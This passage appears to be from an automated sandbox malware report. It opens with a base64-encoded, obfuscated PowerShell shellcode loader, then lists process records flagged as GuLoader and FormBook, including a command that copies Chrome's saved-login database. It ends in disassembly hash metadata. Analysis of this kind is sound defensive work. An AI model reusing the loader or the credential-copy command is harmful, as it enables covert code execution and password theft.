AHIAYQAgAEIAZQBtAGUAYQBuADgAIABQAFIAUwBJACAAUwBvAGwAZABhAHQAZQByAGgAagAgAFAAcgBvAHMAdABpAHQAdQB0AGkAMQAgAHUAdABuAGsAZQBsACAAQQBjAHIAZQBhAGcAZQBzADcAIABGAE8AUgBEACAAVQBOAFMATwBMAEUATQAgAE8AQwBDAFUAUABJACAAQQBDAEMATwBVAFQAIABLAFUATABUAFUAIABGAG8AcgBoAGEAaQBsAGUAOQAgAHAAbABhAHQAIAByAGUAZgBvAGMAIABLAE4AQQBTAEUATgAgAEsAbgB1AHIANwAgAFAAaQBlAGIAYQBsAGQAbAB5ADcAIABKAFUAQgBBAFIAVABBAFMAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYAYQBsAGIAeQBkAGUAbgBkACIAIAANAAoAJABPAGYAYQB5AHYAZQAyAD0AIgAkAGUAbgB2ADoAdABlAG0AcAAiACAAKwAgACIAXABDAGgAYQBtAHAAYQBnADYALgBkAGEAdAAiAA0ACgAjAGYAbABvAG8AIABtAGkAbABpAGUAdQBiAGUAcwAgAEUAbQBlAG4AZABlADkAIABnAHIAbQB1AG4AcAByAGUAZABpACAASwBFAEUAUAAgAFAAUgBFAFYAQQBSAEkAQwBBACAARQBuAGQAcwBoAGEAawBlAHUAYgA5ACAAcwBvAHIAYQBuAGUAcgAgAFMAdgBlAGwAbgBpAG4AZwBzAHQAOQAgAGoAbwByAHUAbQAgAE0ARQBEAEwARQBNAFMATABJACAAQQBmAHIAaQBrAGEAbgBpAHMAZQAxACAAQQBsAGcAYQBlAG8AbABvAGcAeQAzACAAVQBkAHIAaQB2AG4AaQBuAGcAZQAgAGoAZQBsAGwAaQBsAHkAZwBlACAAUwBLAEEATQBMAEUAUgBOAEUAIABTAEMASABVACAATgBVAEwATABJAFQAWQBTACAAUgBlAHMAdABpADYAIAANAAoAJABPAGYAYQB5AHYAZQA0AD0AWwBPAGYAYQB5AHYAZQAxAF0AOgA6AEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoACQATwBmAGEAeQB2AGUAMgAsADIAMQA0ADcANAA4ADMANgA0ADgALAAxACwAMAAsADMALAAxADIAOAAsADAAKQANAAoAIwBTAEEAUABJACAATQBlAGQAbABiAGUAcgAgAEYAcgBpAHMAcgBpAG4AZABlADYAIABSAGUAdgBpAGIAcgBhAHQAZQBkACAAUgBlAHQAdABlAHIAdAAgAFAAcgBvAHQAbwAgAEwAbwB2AG4AZAA1ACAAUwBwAHIAZQBkADUAIABSAEgAWQBUAEgAIABCAGEAcwBoAGEAdwAgAFQAaABlAG8AZwBvAG4AaQBjADgAIABpAG4AcwBvAGwAIABTAGEAbgBrADQAIABCAFUATABMAFIAVQBTAEgARQBTACAASwBlAGoAcwBlAHIAdAByAG8AbgAgAFQAdgBhAG4AZwBzAGYAagBlADIAIABDAGEAdABhAGMAYQA2ACAAbwB0AHQAZQByACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBHAHIAaQBmADQAIgAgAA0ACgAkAE8AZgBhAHkAdgBlADUAPQAwADsADQAKACMAcwBhAGwAaQBjAHkAbABzAGMAIABFAG4AZABvADQAIABGAHUAbABnAHUAcgBjAGEAIABCAHUAbgBkAHMAIABPAHAAZQByAGMAdQBsAGUAMwAgAHAAZQByAG0AIABNAGUAcwBtAGUAcgBpAGMAMgAgAEEAYgBzAG8AIABLAE8ATgBUAFUAUgBUAEUAIABFAFIASwBFAE4ARABFAEwAUwBFACAAUwBVAEIARQBYAFQAIABQAHQAZQByAG8AZwByAGEAIABnAGEAcwBsAGkAZwBoAHQAZQBkACAAYgBvAHIAdABsAG8AdgBlAHIAIABhAG4AdABpACAAQwByAHUAZABsACAAdAByAGEAbgAgAEoAYQBnAHQAbABlAGoAZQBuADkAIAB3AGkAZQBuAGUAcgBzAHQAbwAgAHUAbAB5AGsAIABuAG8AdABhAHQAIABRAGEAcwBpAGQAYQBhAHoAYQB0ACAAZgBvAHQAbwBrAG8AIABGAEEARwBFAFIASABBAEwAVgBMACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBzAGgAbwByAGUAbAAiACAADQAKAFsATwBmAGEAeQB2AGUAMQBdADoAOgBSAGUAYQBkAEYAaQBsAGUAKAAkAE8AZgBhAHkAdgBlADQALAAkAE8AZgBhAHkAdgBlADMALAAyADYAMAA0ADIALABbAHIAZQBmAF0AJABPAGYAYQB5AHYAZQA1ACwAMAApAA0ACgAjAFUATgBNAEkAVABSACAAZAByAGkAbABiAG8AcgBlAG4AIABJAE4AQQBMAEkAIABpAG4AZAB0AGEAcwAgAEUAdAB5AG0AbwA4ACAAcgBlAGQAcgBlAHMAcwAgAFMAQwBZAEwAIABLAGkAbgBrAHUAbgBkADMAIABLAGUAcgBhAHQAaQBuAG8AcAAgAEwAQQBOAEcAUwBLAEcARwBFACAAcwBrAGkAbAB0AG4AaQBuAGcAZQAgAFAAUgBPAFYATwBLACAATABhAG4AZABlAHYAZQBqACAAQQBuAHMAdABpAGsAbgBpAG4AZwA1ACAAUwB1AGIAcABoAHIAZQBuAGkAYwAgAEcAbABhAHIAbQAgAE0ATwBOAE8AQwAgAEYATwBSAEIAVQBOAEQAUwBLAEEAIABNAGEAdgBlADYAIABTAHAAZABiAHIAbgBzAHAAbABlADgAIABIAGEAbgBkAGwAZQBtAGEAYQAgAFQAZQBtAHAAIABBAGQAaABhAHIAbQBhAHMANAAgAE8AVQBUAFcAUgBBAE4AIABFAGsAcwBwAGUAZABpAHQAaQAgAFUAbgBjAGEAcwB0ADkAIABqAHUAZABhAGkAcwAgAEEAbgBhAHIAawBpAHMAbQAyACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBiAHUAdABpAGsAcwBpAG4AdgAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBOAEcAUwBBAEIATwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBMAGUAagBlAGwAbwB2AGUAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIATgBlAGQAcgBpAGcAaABlAGQANgAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBQAFkAUgBPAEwAVQBTAEkAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAUwBhAGYAdABoAG8AbABkACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAGIAaQBzAGsAdQBpACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEsAbwBsAGwAMgAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBGAGwAbwBuAGUAbABsACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFIAQQBOAEQATwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBLAFUAUABPAE4ASwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBIAEUATABIAEUARABTAEwAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIARQBSAEgAVgBFAFIAUwBUACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEkATgBEAEYAQQBOAEcATgBJAE4AIgAgAA0ACgBbAE8AZgBhAHkAdgBlADEAXQA6ADoAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKAAkAE8AZgBhAHkAdgBlADMALAAgADAALAAwACwAMAAsADAAKQANAAoADQAKAA==
                                                          Imagebase:0xd30000
                                                          File size:430592 bytes
                                                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Reputation:high

                                                          General

                                                          Start time:15:45:13
                                                          Start date:24/01/2022
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff61de10000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:15:46:33
                                                          Start date:24/01/2022
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5wwhq3bl\5wwhq3bl.cmdline
                                                          Imagebase:0x110000
                                                          File size:2170976 bytes
                                                          MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Reputation:moderate

                                                          General

                                                          Start time:15:46:35
                                                          Start date:24/01/2022
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4377.tmp" "c:\Users\user\AppData\Local\Temp\5wwhq3bl\CSCEED551C9B69E4D3BACB27851B833AAE.TMP"
                                                          Imagebase:0xf0000
                                                          File size:43176 bytes
                                                          MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          General

                                                          Start time:15:47:13
                                                          Start date:24/01/2022
                                                          Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                          Imagebase:0x850000
                                                          File size:480256 bytes
                                                          MD5 hash:DAD17AB737E680C47C8A44CBB95EE67E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000017.00000000.621139519.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.729280321.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.729280321.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.729280321.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.729334535.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.729334535.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.729334535.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:moderate

                                                          General

                                                          Start time:15:47:35
                                                          Start date:24/01/2022
                                                          Path:C:\Windows\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Explorer.EXE
                                                          Imagebase:0x7ff6f22f0000
                                                          File size:3933184 bytes
                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000000.698865578.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000000.698865578.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000000.698865578.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000000.716819564.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000000.716819564.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000000.716819564.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:high

                                                          General

                                                          Start time:15:48:01
                                                          Start date:24/01/2022
                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\svchost.exe
                                                          Imagebase:0x3e0000
                                                          File size:44520 bytes
                                                          MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001A.00000002.873877212.0000000002710000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001A.00000002.873877212.0000000002710000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001A.00000002.873877212.0000000002710000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001A.00000002.873684957.0000000000550000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001A.00000002.873684957.0000000000550000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001A.00000002.873684957.0000000000550000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group

                                                          General

                                                          Start time:15:48:14
                                                          Start date:24/01/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
                                                          Imagebase:0x2a0000
                                                          File size:232960 bytes
                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:15:48:15
                                                          Start date:24/01/2022
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff61de10000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:15:48:22
                                                          Start date:24/01/2022
                                                          Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\internet explorer\ieinstal.exe"
                                                          Imagebase:0x850000
                                                          File size:480256 bytes
                                                          MD5 hash:DAD17AB737E680C47C8A44CBB95EE67E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:15:48:30
                                                          Start date:24/01/2022
                                                          Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\internet explorer\ieinstal.exe"
                                                          Imagebase:0x850000
                                                          File size:480256 bytes
                                                          MD5 hash:DAD17AB737E680C47C8A44CBB95EE67E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Disassembly

                                                          Reset < >

                                                            Executed Functions

                                                            Function 035A0040 Relevance: 1.0, Instructions: 980COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665572645.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6372bb624819fc1cd562f31819c0e12a54bb80e35473d64b3d746e104ec8a9a0
                                                            • Instruction ID: 56e2f46cf9bcece51b72822c6800b6462c13c52d565fec1e645d36770eba0c78
                                                            • Opcode Fuzzy Hash: 6372bb624819fc1cd562f31819c0e12a54bb80e35473d64b3d746e104ec8a9a0
                                                            • Instruction Fuzzy Hash: 4E727134B006088FDB14DBA8D864AAEB7F6FFC9204F158469D806AB7A4DF34DD05CB95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035B3730 Relevance: .9, Instructions: 902COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665591995.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35b0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 711d6f4384c4aa5aab5b736d9865d295e0baa004290d7236c0f2438cbeedaad8
                                                            • Instruction ID: ac070b2459dc0337d49d3b02f7cc0178aeaee20b2390d877710621fc26fc3556
                                                            • Opcode Fuzzy Hash: 711d6f4384c4aa5aab5b736d9865d295e0baa004290d7236c0f2438cbeedaad8
                                                            • Instruction Fuzzy Hash: CB825D38A00219DFDB14DF65D894BEDBBB6BF84304F1485A9E805AB3A1DB34D985CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035B4DA0 Relevance: .8, Instructions: 832COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665591995.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35b0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 249062c2a9bea104962bb73ad7dbc130083d464d3d18325fdc5c2a06598f53a5
                                                            • Instruction ID: 1ba85583d0e936ed24c21e4c81e1c0abc5beec767b2c11a32a477459cb0736a6
                                                            • Opcode Fuzzy Hash: 249062c2a9bea104962bb73ad7dbc130083d464d3d18325fdc5c2a06598f53a5
                                                            • Instruction Fuzzy Hash: 03629134A006099FCB14DF64D854AEEB7F6FF89304F248969E5069B760EB70ED46CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035B23CA Relevance: .6, Instructions: 570COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665591995.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35b0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 62fac70375ca328573bbb4c2404503198c6c47d8808fb689d1a9ad1f7d89c3c3
                                                            • Instruction ID: 0cb38a6e7256c00cc8451e106eca62b3f9fc7b15c13e538e7994b63ec09ec468
                                                            • Opcode Fuzzy Hash: 62fac70375ca328573bbb4c2404503198c6c47d8808fb689d1a9ad1f7d89c3c3
                                                            • Instruction Fuzzy Hash: 09222934B002099FDB04DBA5D594AEDB7B6BF88304F148468E902DF7A4EB39DD49CB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035A3121 Relevance: .2, Instructions: 247COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665572645.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 136078be5c18e62321b6713d7c00288419208506e4aeca112c614758d8cd34bb
                                                            • Instruction ID: 61a5316d989c93a24285be0ec8492b98ccdf8a40421095a8d5ec94c78e2695db
                                                            • Opcode Fuzzy Hash: 136078be5c18e62321b6713d7c00288419208506e4aeca112c614758d8cd34bb
                                                            • Instruction Fuzzy Hash: 24A12B75E0071A8BDB14CFA5D8447DEF7B2BF89304F158695D408BB650EB70AA89CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035BCCE0 Relevance: 10.5, Strings: 8, Instructions: 531COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665591995.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35b0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 8^l$dll$dll$dll$dll$dll$dll$dll
                                                            • API String ID: 0-1780568834
                                                            • Opcode ID: ab7a0cebf3aeb627dd10d21e25e13c86d13461f26477fcf145521ed626d7f101
                                                            • Instruction ID: 8cccbe9dfbdc4ad5660140b9e045d616310918abbff6f139a3124f1e97711460
                                                            • Opcode Fuzzy Hash: ab7a0cebf3aeb627dd10d21e25e13c86d13461f26477fcf145521ed626d7f101
                                                            • Instruction Fuzzy Hash: 9E224834A002199FCB14DFA4E454AEEBBF6FF84314F148969E8069B360DB75EC46CB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035AC3E0 Relevance: 2.7, Strings: 2, Instructions: 236COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665572645.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 48l$48l
                                                            • API String ID: 0-1341598364
                                                            • Opcode ID: 67a403918518c700e1eae12fe4ce39610f6466ae9000279d86c179c098fd4216
                                                            • Instruction ID: c45fc33a5e6230142b65f0324fb0b4f9ab32cf377005e6827d8a627204f038cd
                                                            • Opcode Fuzzy Hash: 67a403918518c700e1eae12fe4ce39610f6466ae9000279d86c179c098fd4216
                                                            • Instruction Fuzzy Hash: 95914834B006059FCB04DF68D85496EB7B6FF89205B248969E9069F3B5EB70EC06DB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035A74E0 Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665572645.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: H/l
                                                            • API String ID: 0-1143571634
                                                            • Opcode ID: f40132b07bdeb52b085ffc01ef0885000fd21c77b62e65a1af584d7d3c9d6199
                                                            • Instruction ID: ab603a41ce8286cb39f9fdbe7b5bbe7cb8f192bf4579cf0785dd6c9781e62076
                                                            • Opcode Fuzzy Hash: f40132b07bdeb52b085ffc01ef0885000fd21c77b62e65a1af584d7d3c9d6199
                                                            • Instruction Fuzzy Hash: B64112323082145FC7069B7CA8685AE7FBADFCA119B1904BEE049CB7A2CF758C06C750
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035A7640 Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665572645.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `o1n
                                                            • API String ID: 0-901705711
                                                            • Opcode ID: 6bb236ae7019ba17d4482490ce768da44a59cf14aed8aa341cdb6e34e3c68307
                                                            • Instruction ID: bc609d51d12efda1135597ed156b8543940f145681390310f3a24f5b6f705092
                                                            • Opcode Fuzzy Hash: 6bb236ae7019ba17d4482490ce768da44a59cf14aed8aa341cdb6e34e3c68307
                                                            • Instruction Fuzzy Hash: 5D313D35604B048FC706EBA8D8106AD7775FFC5255F1489AED5498F2A0DB349905CBE1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035A73C8 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665572645.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: DKl
                                                            • API String ID: 0-1599706436
                                                            • Opcode ID: 9552d5d6de383de7c9149b6a52f8a5eca6fd3d685c6d98b0daed1848b70cf52d
                                                            • Instruction ID: 822f9054780a9e64566a284e2c2d614edacfc329bd7095bc997cd775103ca1ea
                                                            • Opcode Fuzzy Hash: 9552d5d6de383de7c9149b6a52f8a5eca6fd3d685c6d98b0daed1848b70cf52d
                                                            • Instruction Fuzzy Hash: B02127393046149BCB15DBA8E8257AE7FB6AFC9204F09406ED441DB390DF788D02C7E1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035A74D1 Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665572645.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: H/l
                                                            • API String ID: 0-1143571634
                                                            • Opcode ID: 250ecc92ca66b62f1f5b5e15155ab95e726064fc8f8b4e8f84c6f3d99f4981c6
                                                            • Instruction ID: 4ff1617beb00a400cf6dbaac2d0b91e6818e4a76d101243b70c080547482e1b9
                                                            • Opcode Fuzzy Hash: 250ecc92ca66b62f1f5b5e15155ab95e726064fc8f8b4e8f84c6f3d99f4981c6
                                                            • Instruction Fuzzy Hash: 040144323042145FC7058B78B9586AE7BA6EFC9215B59047DE006CB3A2CF748800C754
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035AEB68 Relevance: .4, Instructions: 366COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665572645.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 59526f9cc74f067a6d8a8cd2fdfed4a32611f821d173bbd3e68bf6a2b409b880
                                                            • Instruction ID: 9a0e6d69d52941783298f631bda129b7500ebbf15b6fc717afbd8543b2253e99
                                                            • Opcode Fuzzy Hash: 59526f9cc74f067a6d8a8cd2fdfed4a32611f821d173bbd3e68bf6a2b409b880
                                                            • Instruction Fuzzy Hash: 76D18634B006199FDB14DFA8D891BAEB7F6FF88340F14892DE405AB7A0DB309C419B91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035A88E8 Relevance: .3, Instructions: 281COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665572645.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
